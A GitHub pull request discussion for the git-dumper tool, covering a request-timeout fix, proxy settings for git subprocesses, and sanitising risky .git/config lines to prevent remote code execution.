search

arthaud / git-dumper

A tool to dump a git repository from a website
MIT License
1.69k stars 235 forks source link

Timeout,proxy and rce fix #43

Closed srozb closed 4 months ago

srozb commented 4 months ago

3 commits stacked here:

  1. Timeout was not applied to the first request and therefore causing script to stuck if target was not responding.
  2. As mentioned in #42, potential dangerous variables in .git/config file may cause RCE. This commit tries to comment out lines that may be unsafe - feel free to add more patterns of such lines. I'm aware this is not a perfect solution but at least some kind of protection.
  3. I'm not sure if proxy configuration was applied to git command issued as a subprocess. This commit adds environment variable ALL_PROXY to ensure git communication uses configured proxy.
srozb commented 4 months ago

Please take another look at changed source, as I'm not 100% sure if I picked the correct line to move the environment creation to.

I think eventually it'd be better to move the ALL_PROXY env variable creation just after the pysocks proxy is set up and ensure every subprocess call is taken with env=environment argument. It'd also be nice to bound sanitization with checkout putting it together in separate function.

(thinking out loud)

arthaud commented 4 months ago

Great, thanks for contributing!